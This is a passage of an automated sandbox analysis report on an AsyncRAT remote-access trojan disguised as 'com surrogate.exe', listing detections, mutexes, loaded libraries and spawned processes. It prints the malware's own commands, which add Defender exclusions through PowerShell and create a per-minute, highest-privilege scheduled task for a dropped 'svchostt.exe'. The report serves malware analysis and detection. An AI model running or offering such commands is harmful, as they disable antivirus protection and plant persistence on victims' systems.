                      Source: C:\Users\user\Desktop\com surrogate.exeCode function: 0_2_00007FFD9B7E16E90_2_00007FFD9B7E16E9
                      Source: C:\Users\user\Desktop\com surrogate.exeCode function: 0_2_00007FFD9B7E72420_2_00007FFD9B7E7242
                      Source: C:\Users\user\Desktop\com surrogate.exeCode function: 0_2_00007FFD9B7E60960_2_00007FFD9B7E6096
                      Source: C:\Users\user\Desktop\com surrogate.exeCode function: 0_2_00007FFD9B7E98B90_2_00007FFD9B7E98B9
                      Source: C:\Users\user\Desktop\com surrogate.exeCode function: 0_2_00007FFD9B7E99620_2_00007FFD9B7E9962
                      Source: C:\Users\user\Desktop\com surrogate.exeCode function: 0_2_00007FFD9B7E20C50_2_00007FFD9B7E20C5
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD9B8D30E99_2_00007FFD9B8D30E9
                      Source: C:\Users\user\svchostt.exeCode function: 15_2_00007FFD9B7F16E915_2_00007FFD9B7F16E9
                      Source: C:\Users\user\svchostt.exeCode function: 15_2_00007FFD9B7F0E5E15_2_00007FFD9B7F0E5E
                      Source: C:\Users\user\svchostt.exeCode function: 15_2_00007FFD9B7F20C515_2_00007FFD9B7F20C5
                      Source: C:\Users\user\svchostt.exeCode function: 17_2_00007FFD9B7D16E917_2_00007FFD9B7D16E9
                      Source: C:\Users\user\svchostt.exeCode function: 17_2_00007FFD9B7D0E5E17_2_00007FFD9B7D0E5E
                      Source: C:\Users\user\svchostt.exeCode function: 17_2_00007FFD9B7D20C517_2_00007FFD9B7D20C5
                      Source: C:\Users\user\svchostt.exeCode function: 18_2_00007FFD9B7D16E918_2_00007FFD9B7D16E9
                      Source: C:\Users\user\svchostt.exeCode function: 18_2_00007FFD9B7D0E5E18_2_00007FFD9B7D0E5E
                      Source: C:\Users\user\svchostt.exeCode function: 18_2_00007FFD9B7D20C518_2_00007FFD9B7D20C5
                      Source: C:\Users\user\svchostt.exeCode function: 19_2_00007FFD9B7D16E919_2_00007FFD9B7D16E9
                      Source: C:\Users\user\svchostt.exeCode function: 19_2_00007FFD9B7D0E5E19_2_00007FFD9B7D0E5E
                      Source: C:\Users\user\svchostt.exeCode function: 19_2_00007FFD9B7D20C519_2_00007FFD9B7D20C5
                      Source: com surrogate.exe, 00000000.00000000.1648154375.00000000009C2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameXClient.exel% vs com surrogate.exe
                      Source: com surrogate.exe, 00000000.00000002.2897221401.0000000002D2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient.exel% vs com surrogate.exe
                      Source: com surrogate.exeBinary or memory string: OriginalFilenameXClient.exel% vs com surrogate.exe
                      Source: com surrogate.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: com surrogate.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 0.0.com surrogate.exe.9b0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 0.2.com surrogate.exe.2d2f730.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 0.2.com surrogate.exe.2d2f730.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000000.00000000.1647881005.00000000009B2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000000.00000002.2897221401.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: C:\Users\user\svchostt.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: com surrogate.exe, TmY9KD9bMG.csCryptographic APIs: 'TransformFinalBlock'
                      Source: com surrogate.exe, TmY9KD9bMG.csCryptographic APIs: 'TransformFinalBlock'
                      Source: com surrogate.exe, VffR91FvSC.csCryptographic APIs: 'TransformFinalBlock'
                      Source: svchostt.exe.0.dr, TmY9KD9bMG.csCryptographic APIs: 'TransformFinalBlock'
                      Source: svchostt.exe.0.dr, TmY9KD9bMG.csCryptographic APIs: 'TransformFinalBlock'
                      Source: svchostt.exe.0.dr, VffR91FvSC.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.com surrogate.exe.2d2f730.0.raw.unpack, TmY9KD9bMG.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.com surrogate.exe.2d2f730.0.raw.unpack, TmY9KD9bMG.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.com surrogate.exe.2d2f730.0.raw.unpack, VffR91FvSC.csCryptographic APIs: 'TransformFinalBlock'
                      Source: com surrogate.exe, SSDW2h8Bu2.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: com surrogate.exe, SSDW2h8Bu2.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: svchostt.exe.0.dr, SSDW2h8Bu2.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: svchostt.exe.0.dr, SSDW2h8Bu2.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.com surrogate.exe.2d2f730.0.raw.unpack, SSDW2h8Bu2.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 0.2.com surrogate.exe.2d2f730.0.raw.unpack, SSDW2h8Bu2.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engineClassification label: mal100.troj.evad.winEXE@20/21@1/3
                      Source: C:\Users\user\Desktop\com surrogate.exeFile created: C:\Users\user\svchostt.exeJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6724:120:WilError_03
                      Source: C:\Users\user\svchostt.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4828:120:WilError_03
                      Source: C:\Users\user\Desktop\com surrogate.exeMutant created: \Sessions\1\BaseNamedObjects\FmQtb653HyFy3zc0
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5220:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1696:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6120:120:WilError_03
                      Source: C:\Users\user\Desktop\com surrogate.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmpJump to behavior
                      Source: com surrogate.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: com surrogate.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      Source: C:\Users\user\Desktop\com surrogate.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: com surrogate.exeVirustotal: Detection: 69%
                      Source: com surrogate.exeReversingLabs: Detection: 81%
                      Source: C:\Users\user\Desktop\com surrogate.exeFile read: C:\Users\user\Desktop\com surrogate.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\com surrogate.exe "C:\Users\user\Desktop\com surrogate.exe"
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\com surrogate.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'com surrogate.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\svchostt.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchostt.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchostt" /tr "C:\Users\user\svchostt.exe"
                      Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Users\user\svchostt.exe C:\Users\user\svchostt.exe
                      Source: unknownProcess created: C:\Users\user\svchostt.exe "C:\Users\user\svchostt.exe"
                      Source: unknownProcess created: C:\Users\user\svchostt.exe "C:\Users\user\svchostt.exe"
                      Source: unknownProcess created: C:\Users\user\svchostt.exe C:\Users\user\svchostt.exe
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\com surrogate.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'com surrogate.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\svchostt.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchostt.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchostt" /tr "C:\Users\user\svchostt.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: linkinfo.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: avicap32.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: msvfw32.dllJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
